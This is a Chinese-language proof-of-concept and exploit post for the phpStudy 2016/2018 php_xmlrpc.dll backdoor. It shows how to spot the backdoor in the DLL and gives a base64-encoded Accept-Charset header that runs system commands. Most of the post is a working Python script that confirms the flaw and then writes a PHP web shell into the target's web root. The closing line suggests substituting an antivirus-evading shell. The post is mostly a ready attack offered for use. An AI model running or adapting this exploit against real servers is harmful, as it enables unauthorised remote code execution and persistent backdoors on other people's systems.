POC
2019年9月20日,網上傳出 phpStudy 軟體存在後門,隨後作者立即釋出宣告進行澄清,其真實情況是該軟體官網於2016年被非法入侵,程式包自帶PHP的php_xmlrpc.dll模組被植入隱藏後門,可以正向執行任意php程式碼。
影響版本:
- phpStudy2016-php-5.2.17
- phpStudy2016-php-5.4.45
- phpStudy2018-php-5.2.17
- phpStudy2018-php-5.4.45
後門存在於*\ext\php_xmlrpc.dll
,用記事本開啟搜尋eval
,如下圖所示則又可能存在後門
抓包,新增Accept-charset
,後面對rce進行base64加密
Accept-charset: c3lzdGVtKCJ3aG9hbWkiKTs=
注意修改
Accept-Encoding: gzip,deflate
,deflate前的空格需要刪除
EXP
很自然的就能寫出相應exp(github)
import base64
import random
import requests
import string
head={
'Accept-Encoding':'gzip,deflate',
'Accept-Charset':'c3lzdGVtKCJlY2hvIGhhaGExMjMiKTs=' # echo haha123
}
def get_standard_url(url):
if url[:7] != "http://" or url[:8] != "https://":
url = "http://"+url
return url
else:
return False
def exp():
head["Accept-Charset"] = "c3lzdGVtKCJjaGRpciIpOw==" # system("chdir")
res1 = requests.get(url=url,headers=head,timeout=5,allow_redirects=False)
path = str(res1.text.split("\n",1)[0]).strip()
shell_name = ''.join(random.sample(string.ascii_letters+string.digits,8))
key = ''.join(random.sample(string.ascii_letters+string.digits,4))
exp = f"fputs(fopen('{path}\PHPTutorial\WWW\{shell_name}.php','w'),'<?php @eval($_POST[{key}]); ?>');"
exp_encode = str(base64.b64encode(exp.encode('utf-8'))).split("'",2)[1]
head['Accept-Charset'] = exp_encode
requests.get(url=url, headers=head, timeout=5, allow_redirects=False)
return f"[!] Shell_name={shell_name}.php, Key={key}"
if __name__=="__main__":
url = input("[+] Target: ")
url = get_standard_url(url)
try:
res = requests.get(url=url, headers=head, timeout=5, allow_redirects=False)
if res.status_code == 200 and res.text[:7] == "haha123":
print("[*] POC EXISTS.")
print(exp())
else:
print("[-] POC NOT EXISTS.")
except:
print("[!] ERROR!\n")
注意,這裡沒有對shell做免殺,可把自己收藏的shell做外部匯入替換